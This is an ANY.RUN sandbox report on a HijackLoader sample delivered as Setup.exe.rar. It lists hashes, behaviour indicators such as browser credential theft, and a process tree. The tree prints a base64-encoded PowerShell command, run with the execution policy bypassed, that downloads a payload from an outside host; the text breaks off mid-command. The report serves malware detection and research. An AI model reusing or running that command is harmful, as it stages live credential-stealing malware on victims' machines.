Malware analysis Setup.exe.rar Malicious activity | ANY.RUN

Add for printing

File name:	Setup.exe.rar
Full analysis:	https://app.any.run/tasks/b5b2066d-8e9c-437b-99f5-a738c88f753b
Verdict:	Malicious activity
Threats:	HijackLoader is a modular malware acting as a vehicle for distributing different types of malicious software on compromised systems. It gained prominence during the summer of 2023 and has since been used in multiple attacks against organizations from various sectors, including hospitality businesses. A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Malware Trends Tracker >>>
Analysis date:	November 27, 2024, 14:04:07
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	autoit susp-powershell hijackloader loader stealer
Indicators:
MIME:	application/x-rar
File info:	RAR archive data, v5
MD5:	785FEF3D3C8D2CC62A657A8C72FCBAEB
SHA1:	A9A973225667930D8375DA7F524D9D5B15AC0764
SHA256:	452A2E3930CC73210B276FECEC7BA64433A3AD89F398258C9A79DC419068F707
SSDEEP:	196608:BRn4NLPhbtyzAqUKK2iKR2p1EZeb1H55Z8s:r4x5btEAqyJKw151H5TF

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 300 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: 240 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.3636.19041.0
Adobe Acrobat (64-bit) (23.001.20093)
Adobe Flash Player 32 NPAPI (32.0.0.465)
Adobe Flash Player 32 PPAPI (32.0.0.465)
CCleaner (6.20)
FileZilla 3.65.0 (3.65.0)
Google Chrome (122.0.6261.70)
Google Update Helper (1.3.36.51)
Java 8 Update 271 (64-bit) (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Microsoft Edge (122.0.2365.59)
Microsoft Edge Update (1.3.185.17)
Microsoft Office Professional 2019 - de-de (16.0.16026.20146)
Microsoft Office Professional 2019 - en-us (16.0.16026.20146)
Microsoft Office Professional 2019 - es-es (16.0.16026.20146)
Microsoft Office Professional 2019 - it-it (16.0.16026.20146)
Microsoft Office Professional 2019 - ja-jp (16.0.16026.20146)
Microsoft Office Professional 2019 - ko-kr (16.0.16026.20146)
Microsoft Office Professional 2019 - pt-br (16.0.16026.20146)
Microsoft Office Professional 2019 - tr-tr (16.0.16026.20146)
Microsoft Office Professionnel 2019 - fr-fr (16.0.16026.20146)
Microsoft Office профессиональный 2019 - ru-ru (16.0.16026.20146)
Microsoft OneNote - en-us (16.0.16026.20146)
Microsoft Update Health Tools (3.74.0.0)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (123.0)
Mozilla Maintenance Service (123.0)
Notepad++ (64-bit x64) (7.9.1)
Office 16 Click-to-Run Extensibility Component (16.0.15726.20202)
Office 16 Click-to-Run Licensing Component (16.0.16026.20146)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15928.20198)
PowerShell 7-x64 (7.3.5.0)
Skype version 8.104 (8.104)
Update for Windows 10 for x64-based Systems (KB4023057) (2.59.0.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.63.0.0)
Update for Windows 10 for x64-based Systems (KB4480730) (2.55.0.0)
Update for Windows 10 for x64-based Systems (KB5001716) (8.93.0.0)
VLC media player (3.0.11)
WinRAR 5.91 (64-bit) (5.91.0)
Windows PC Health Check (3.6.2204.08001)

Hotfixes

Client LanguagePack Package
DotNetRollup
DotNetRollup 481
FodMetadata Package
Foundation Package
Hello Face Package
InternetExplorer Optional Package
KB5003791
KB5011048
KB5015684
KB5033052
LanguageFeatures Basic en us Package
LanguageFeatures Handwriting en us Package
LanguageFeatures OCR en us Package
LanguageFeatures Speech en us Package
LanguageFeatures TextToSpeech en us Package
MSPaint FoD Package
MediaPlayer Package
Microsoft OneCore ApplicationModel Sync Desktop FOD Package
Microsoft OneCore DirectX Database FOD Package
NetFx3 OnDemand Package
Notepad FoD Package
OpenSSH Client Package
PowerShell ISE FOD Package
Printing PMCPPC FoD Package
Printing WFS FoD Package
ProfessionalEdition
QuickAssist Package
RollupFix
ServicingStack
ServicingStack 3989
StepsRecorder Package
TabletPCMath Package
UserExperience Desktop Package
WordPad FoD Package

Add for printing

MALICIOUS
- Executing a file with an untrusted certificate
  - Setup.exe (PID: 6960)
  - Setup.exe (PID: 3732)
  - RescueCDBurner.exe (PID: 6832)
  - RescueCDBurner.exe (PID: 6872)
  - RescueCDBurner.exe (PID: 3172)
  - RescueCDBurner.exe (PID: 6964)
  - RescueCDBurner.exe (PID: 6004)
  - RescueCDBurner.exe (PID: 6816)
- Actions looks like stealing of personal data
  - ensuer.com (PID: 5972)
- Steals credentials from Web Browsers
  - ensuer.com (PID: 5972)
- Bypass execution policy to execute commands
  - powershell.exe (PID: 6076)
  - powershell.exe (PID: 5252)
- Downloads the requested resource (POWERSHELL)
  - powershell.exe (PID: 6076)
  - powershell.exe (PID: 5252)
- Changes powershell execution policy (Bypass)
  - ensuer.com (PID: 5972)
  - ensuer.com (PID: 4684)
- HIJACKLOADER has been detected (YARA)
  - RescueCDBurner.exe (PID: 6872)
  - RescueCDBurner.exe (PID: 6964)
  - RescueCDBurner.exe (PID: 6816)
  - RescueCDBurner.exe (PID: 6004)
- Known privilege escalation attack
  - dllhost.exe (PID: 5560)
SUSPICIOUS
- Reads security settings of Internet Explorer
  - Setup.exe (PID: 6960)
  - Setup.exe (PID: 3732)
- Starts application with an unusual extension
  - Setup.exe (PID: 6960)
  - Setup.exe (PID: 3732)
  - more.com (PID: 7004)
  - more.com (PID: 6200)
  - RescueCDBurner.exe (PID: 6872)
  - RescueCDBurner.exe (PID: 6816)
  - RescueCDBurner.exe (PID: 6004)
  - RescueCDBurner.exe (PID: 6964)
- Starts the AutoIt3 executable file
  - more.com (PID: 7004)
  - more.com (PID: 6200)
- Executable content was dropped or overwritten
  - more.com (PID: 7004)
  - powershell.exe (PID: 6076)
  - powershell.exe (PID: 5252)
  - RescueCDBurner.exe (PID: 3172)
- BASE64 encoded PowerShell command has been detected
  - ensuer.com (PID: 5972)
  - ensuer.com (PID: 4684)
- Starts POWERSHELL.EXE for commands execution
  - ensuer.com (PID: 5972)
  - ensuer.com (PID: 4684)
- Base64-obfuscated command line is found
  - ensuer.com (PID: 5972)
  - ensuer.com (PID: 4684)
- Creates new GUID (POWERSHELL)
  - powershell.exe (PID: 6076)
  - powershell.exe (PID: 5252)
- Writes data to a memory stream (POWERSHELL)
  - powershell.exe (PID: 6076)
  - powershell.exe (PID: 5252)
- Writes data into a file (POWERSHELL)
  - powershell.exe (PID: 6076)
  - powershell.exe (PID: 5252)
- Process drops legitimate windows executable
  - powershell.exe (PID: 6076)
  - powershell.exe (PID: 5252)
  - RescueCDBurner.exe (PID: 3172)
- The process drops C-runtime libraries
  - powershell.exe (PID: 5252)
  - RescueCDBurner.exe (PID: 3172)
  - powershell.exe (PID: 6076)
- Starts itself from another location
  - RescueCDBurner.exe (PID: 3172)
  - RescueCDBurner.exe (PID: 6832)
- Connects to unusual port
  - explorer.exe (PID: 6072)
INFO
- Executable content was dropped or overwritten
  - WinRAR.exe (PID: 6624)
- The process uses the downloaded file
  - WinRAR.exe (PID: 6624)
- Creates files or folders in the user directory
  - Setup.exe (PID: 6960)
- Manual execution by a user
  - Setup.exe (PID: 6960)
  - Setup.exe (PID: 3732)
- Reads the computer name
  - Setup.exe (PID: 6960)
  - more.com (PID: 7004)
  - Setup.exe (PID: 3732)
- Checks supported languages
  - Setup.exe (PID: 6960)
  - more.com (PID: 7004)
  - Setup.exe (PID: 3732)
- Disables trace logs
  - Setup.exe (PID: 6960)
  - Setup.exe (PID: 3732)
- Checks proxy server information
  - Setup.exe (PID: 6960)
  - Setup.exe (PID: 3732)
- Create files in a temporary directory
  - Setup.exe (PID: 6960)
  - Setup.exe (PID: 3732)
  - more.com (PID: 7004)
- Found Base64 encoded network access via PowerShell (YARA)
  - powershell.exe (PID: 6076)
- Found Base64 encoded file access via PowerShell (YARA)
  - powershell.exe (PID: 6076)
- Gets data length (POWERSHELL)
  - powershell.exe (PID: 6076)
  - powershell.exe (PID: 5252)
- The executable file from the user directory is run by the Powershell process
  - RescueCDBurner.exe (PID: 6832)
  - RescueCDBurner.exe (PID: 3172)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.rar	\|	RAR compressed archive (v5.0) (61.5)
.rar	\|	RAR compressed archive (gen) (38.4)

EXIF

ZIP

FileVersion:	RAR v5
CompressedSize:	15792124
UncompressedSize:	25298592
OperatingSystem:	Win32
ArchivedFileName:	Setup.exe.vir

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

154

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

2092

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

more.com

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

3172

"C:\Users\admin\AppData\Local\20fb0aba-45b7-4605-a8ce-6eb6d36cd179\RescueCDBurner.exe"

C:\Users\admin\AppData\Local\20fb0aba-45b7-4605-a8ce-6eb6d36cd179\RescueCDBurner.exe

powershell.exe

User:

admin

Company:

Rene.E Laboratory

Integrity Level:

MEDIUM

Description:

System Rescuer

Exit code:

Version:

ߨ>InternalName

Modules

Images
c:\users\admin\appdata\local\20fb0aba-45b7-4605-a8ce-6eb6d36cd179\rescuecdburner.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll

3524

C:\WINDOWS\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

—

more.com

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows Explorer

Exit code:

Version:

10.0.19041.3758 (WinBuild.160101.0800)

Modules

Images
c:\users\admin\appdata\local\temp\khjorrid
c:\windows\syswow64\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll

3608

C:\WINDOWS\SysWOW64\more.com

C:\Windows\SysWOW64\more.com

—

RescueCDBurner.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

More Utility

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\syswow64\more.com
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll

3732

"C:\Users\admin\Desktop\Setup.exe"

C:\Users\admin\Desktop\Setup.exe

—

explorer.exe

User:

admin

Company:

Gammadyne Corporation

Integrity Level:

MEDIUM

Description:

Connection Keeper

Exit code:

Version:

22.0

Modules

Images
c:\users\admin\desktop\setup.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\acgenral.dll

4052

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

4684

C:\Users\admin\AppData\Local\Temp\ensuer.com

more.com

User:

admin

Company:

AutoIt Team

Integrity Level:

MEDIUM

Description:

AutoIt v3 Script (Beta)

Exit code:

Version:

3, 3, 15, 1

Modules

Images
c:\users\admin\appdata\local\temp\nreqmbdgttleu
c:\users\admin\appdata\local\temp\ensuer.com
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\shell32.dll

5208

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

5252

powershell -exec bypass -Enc JABtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AIAA9ACAAewAKACAAIAAgACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwAKAAoAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAIgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgAzADYAMAAuAG4AZQB0ACIAKQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkALgBDAGwAbwBzAGUAKAApAAoACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEACgAKACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AYgBhAGkAZAB1AC4AYwBvAG0AIgApAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAuAEMAbABvAHMAZQAoACkACgAKACAAIAAgACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAKAAoAIAAgACAAIAAkAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxACAAPQAgACIAaAB0AHQAcABzADoALwAvAHIAYQBzAGEAMgAuAHIAMgBjAGwAbwB1AGQAbABvAGsAaQB6AHkAbwA5AC4AcwBoAG8AcAAvAGkAbgB0AF8AYwBsAHAAXwBwAGEAbgAuAHQAeAB0ACIACgAgACAAIAAgACQAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAAKACAAIAAgACAAJABxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAIAA9ACAAJABxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQApAAoACgAgACAAIAAgACQAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0ACgAgACAAIAAgACQAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEALgBXAHIAaQB0AGUAKAAkAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQAsACAAMAAsACAAJABxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEALgBMAGUAbgBnAHQAaAApAAoAIAAgACAAIAAkAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAC4AUwBlAGUAawAoADAALAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBTAGUAZQBrAE8AcgBpAGcAaQBuAF0AOgA6AEIAZQBnAGkAbgApAAoACgAgACAAIAAgACQAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARwB1AGkAZABdADoAOgBOAGUAdwBHAHUAaQBkACgAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACkACgAgACAAIAAgACQAbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoAQwBvAG0AYgBpAG4AZQAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQAsACAAJABxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxACkACgAgACAAIAAgAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AIAAtAEkAdABlAG0AVAB5AHAAZQAgAEQAaQByAGUAYwB0AG8AcgB5ACAALQBGAG8AcgBjAGUAIAB8ACAATwB1AHQALQBOAHUAbABsAAoACgAgACAAIAAgACQAbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBDAG8AbQBiAGkAbgBlACgAJABlAG4AdgA6AFQARQBNAFAALAAgACIAJABxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAC4AegBpAHAAIgApAAoAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtACwAIAAkAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAC4AVABvAEEAcgByAGEAeQAoACkAKQAKAAoAIAAgACAAIAAkAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBDAG8AbQBPAGIAagBlAGMAdAAgAFMAaABlAGwAbAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAKACAAIAAgACAAJABtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AIAA9ACAAJABxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEALgBOAGEAbQBlAFMAcABhAGMAZQAoACQAbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQApAAoAIAAgACAAIAAkAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtACAAPQAgACQAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAC4ATgBhAG0AZQBTAHAAYQBjAGUAKAAkAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0A